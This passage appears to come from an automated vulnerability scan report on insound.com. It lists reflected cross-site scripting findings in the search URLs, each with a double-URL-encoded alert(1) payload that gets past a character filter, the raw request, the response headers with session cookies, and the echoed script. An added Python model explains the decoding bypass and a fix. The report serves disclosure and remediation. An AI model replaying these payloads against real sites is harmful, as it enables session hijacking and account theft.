<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Curren$yccac5"><script>alert(1)</script>c8e0ea4401f" />
...[SNIP]...

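The issue and remediation text above is repeated for every entry in this section, and it describes one bug: the web server decodes the path once, a character filter then sees only harmless %22 and %3c sequences, and a second decode inside the application turns them back into " and < just before the value is written into the hidden input's value attribute and into the page title. The following Python model is an added example, not insound.com's code and not part of the scanner output; the server side of the site is not shown, so the blocklist (<, > and "), the second-decode step and the two template sinks are assumptions chosen to reproduce the behaviour the report describes. It builds the double-encoded probe exactly as submitted in the requests, shows the single-encoded form being blocked while the double-encoded form reaches both sinks, and then applies the remediation given above: canonicalise to a fixed point, validate the result, and entity-encode for the output context.

```python
"""Double-URL-decoding bypass of a character filter, modelled and then fixed.

Added example, not insound.com's code. Assumed: the server decodes the path
segment once, a filter rejects values containing < > or ", and the app
decodes a second time before writing into <title> and a quoted attribute.
"""
from typing import Optional
from urllib.parse import quote, unquote
import html

BLOCKED = set('<>"')            # assumed blocklist; the report only says "certain characters"
PROBE = '"><script>alert(1)</script>'   # the attribute-context probe used in the report


def url_encode(value: str, rounds: int = 1) -> str:
    """URL-encode every non-alphanumeric character, `rounds` times over."""
    for _ in range(rounds):
        value = quote(value, safe='')
    return value


def server_decode(path_segment: str) -> str:
    """The single decode the web server applies to a path segment."""
    return unquote(path_segment)


def passes_filter(value: str) -> bool:
    """True when none of the blocked characters is present."""
    return not (BLOCKED & set(value))


def render(query: str) -> str:
    """The two sinks shown in the responses: <title> text and a quoted attribute."""
    return (f'<title>{query}</title>\n'
            f'<input type="hidden" name="query" value="{query}" />')


def render_vulnerable(path_segment: str) -> Optional[str]:
    """Validate the once-decoded value, then decode again: the bug in the report."""
    once = server_decode(path_segment)
    if not passes_filter(once):
        return None                      # request blocked by the filter
    return render(unquote(once))         # second decode re-creates < > " after validation


def canonicalise(value: str, max_rounds: int = 4) -> str:
    """Decode until the value stops changing, so validation sees the final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError('value is URL-encoded more than %d times' % max_rounds)


def render_fixed(path_segment: str) -> Optional[str]:
    """Canonicalise first, validate the result, then encode for the sink."""
    once = server_decode(path_segment)
    try:
        query = canonicalise(once)
    except ValueError:
        return None
    if not passes_filter(query):
        return None
    # Entity-encoding covers both sinks: <title> is RCDATA, so &lt; cannot
    # close it, and &quot; cannot terminate the attribute value.
    return render(html.escape(query, quote=True))


if __name__ == '__main__':
    single = 'Daft%20Punk' + url_encode(PROBE, 1)
    double = 'Daft%20Punk' + url_encode(PROBE, 2)
    print('double-encoded probe  :', double)
    print('single, vulnerable app:', render_vulnerable(single))
    print('double, vulnerable app:', render_vulnerable(double))
    print('double, fixed app     :', render_fixed(double))
    print("D'eon, fixed app      :", render_fixed('D%27eon'))
```

With the vulnerable renderer the double-encoded probe produces exactly the input line shown in the 1.119 response, while the fixed renderer rejects it and still passes benign names such as D'eon through, entity-encoded. Entity-encoding alone would already neutralise both sinks; the canonicalise-then-validate step is the defence-in-depth the remediation text asks for. Note too that the responses above set PHPSESSID, CFID and CFTOKEN without an HttpOnly flag, so script injected this way can read them.
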
1.115. http://www.insound.com/search/query/D'eon&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/D'eon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e44e45114f50 was submitted in the REST URL parameter 3. This input was echoed as c4055"><script>alert(1)</script>44e45114f50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/D'eonc4055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e44e45114f50&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=g08betfo219as5t0embcje8923; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=102697205; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=79255942; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="D'eonc4055"><script>alert(1)</script>44e45114f50" />
...[SNIP]...

1.116. http://www.insound.com/search/query/D'eon&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/D'eon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 61f59%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2dd9703b6fa was submitted in the REST URL parameter 3. This input was echoed as 61f59</title><script>alert(1)</script>2dd9703b6fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/D'eon61f59%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2dd9703b6fa&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=t06k1164vsvnb3okqc7bm9a757; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=261380389; expires=Sun, 09-Jan-2011 02:41:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=445672352; expires=Sun, 09-Jan-2011 02:41:11 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>D'eon61f59</title><script>alert(1)</script>2dd9703b6fa</title>
...[SNIP]...

1.117. http://www.insound.com/search/query/DJ%20/rupture&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/DJ%20/rupture&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21167%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3b0cb5ca909 was submitted in the REST URL parameter 3. This input was echoed as 21167"><script>alert(1)</script>3b0cb5ca909 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/DJ%2021167%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3b0cb5ca909/rupture&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=63eb2n7ddlgu01kv4phcp0ml15; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: CFID=392918233; expires=Sun, 09-Jan-2011 02:37:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=134911883; expires=Sun, 09-Jan-2011 02:37:35 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="DJ 21167"><script>alert(1)</script>3b0cb5ca909" />
...[SNIP]...

1.118. http://www.insound.com/search/query/DJ%20/rupture&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/DJ%20/rupture&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload a4f2d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eca96ee754fd was submitted in the REST URL parameter 3. This input was echoed as a4f2d</title><script>alert(1)</script>ca96ee754fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/DJ%20a4f2d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eca96ee754fd/rupture&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vm6esvvn005qqntp64ba70jlk2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: CFID=208387021; expires=Sun, 09-Jan-2011 02:37:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=267241704; expires=Sun, 09-Jan-2011 02:37:41 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>DJ a4f2d</title><script>alert(1)</script>ca96ee754fd</title>
...[SNIP]...

1.119. http://www.insound.com/search/query/Daft%20Punk&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Daft%20Punk&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d1e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e256a07ce2f9 was submitted in the REST URL parameter 3. This input was echoed as 33d1e"><script>alert(1)</script>256a07ce2f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Daft%20Punk33d1e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e256a07ce2f9&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7m0m0a5egokkmesqo7qavb3m14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=334556894; expires=Sun, 09-Jan-2011 02:38:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=431404204; expires=Sun, 09-Jan-2011 02:38:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Daft Punk33d1e"><script>alert(1)</script>256a07ce2f9" />
...[SNIP]...

1.120. http://www.insound.com/search/query/Daft%20Punk&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Daft%20Punk&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 9d327%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb06fa55ef91 was submitted in the REST URL parameter 3. This input was echoed as 9d327</title><script>alert(1)</script>b06fa55ef91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Daft%20Punk9d327%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb06fa55ef91&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=3c6h702ufvbg3cr9ru43on6j92; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=403284738; expires=Sun, 09-Jan-2011 02:38:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=400013479; expires=Sun, 09-Jan-2011 02:38:12 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Daft Punk9d327</title><script>alert(1)</script>b06fa55ef91</title>
...[SNIP]...

1.121. http://www.insound.com/search/query/Dark%20Dark%20Dark&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Dark%20Dark%20Dark&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload ab7ba%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effa7d5727c3 was submitted in the REST URL parameter 3. This input was echoed as ab7ba</title><script>alert(1)</script>ffa7d5727c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Dark%20Dark%20Darkab7ba%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effa7d5727c3&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=chka8col27iqb0mj94hjoufan2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=48099327; expires=Sun, 09-Jan-2011 02:40:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=287098800; expires=Sun, 09-Jan-2011 02:40:55 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Dark Dark Darkab7ba</title><script>alert(1)</script>ffa7d5727c3</title>
...[SNIP]...

1.122. http://www.insound.com/search/query/Dark%20Dark%20Dark&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Dark%20Dark%20Dark&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21873%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec81f260ae87 was submitted in the REST URL parameter 3. This input was echoed as 21873"><script>alert(1)</script>c81f260ae87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Dark%20Dark%20Dark21873%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec81f260ae87&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=aqdk6l5q5i03umcpt4a1896u42; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=21567812; expires=Sun, 09-Jan-2011 02:40:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=302331938; expires=Sun, 09-Jan-2011 02:40:46 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Dark Dark Dark21873"><script>alert(1)</script>c81f260ae87" />
...[SNIP]...

1.123. http://www.insound.com/search/query/Das%20Racist&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Das%20Racist&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45a6a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e611d543f39a was submitted in the REST URL parameter 3. This input was echoed as 45a6a"><script>alert(1)</script>611d543f39a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Das%20Racist45a6a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e611d543f39a&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=4jf3b38qjcha0l98unh8oh3l76; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=63365012; expires=Sun, 09-Jan-2011 02:37:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=172428867; expires=Sun, 09-Jan-2011 02:37:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Das Racist45a6a"><script>alert(1)</script>611d543f39a" />
...[SNIP]...

1.124. http://www.insound.com/search/query/Das%20Racist&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Das%20Racist&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4e8cb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1c1d752e50d was submitted in the REST URL parameter 3. This input was echoed as 4e8cb</title><script>alert(1)</script>1c1d752e50d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Das%20Racist4e8cb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1c1d752e50d&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2gfbihfchnqsgb4dvcrdfjl9a6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=174579824; expires=Sun, 09-Jan-2011 02:37:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=84200231; expires=Sun, 09-Jan-2011 02:37:29 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Das Racist4e8cb</title><script>alert(1)</script>1c1d752e50d</title>
...[SNIP]...

1.125. http://www.insound.com/search/query/Deerhunter&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Deerhunter&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 68d0e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed1e899527 was submitted in the REST URL parameter 3. This input was echoed as 68d0e</title><script>alert(1)</script>ed1e899527 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Deerhunter68d0e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed1e899527&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
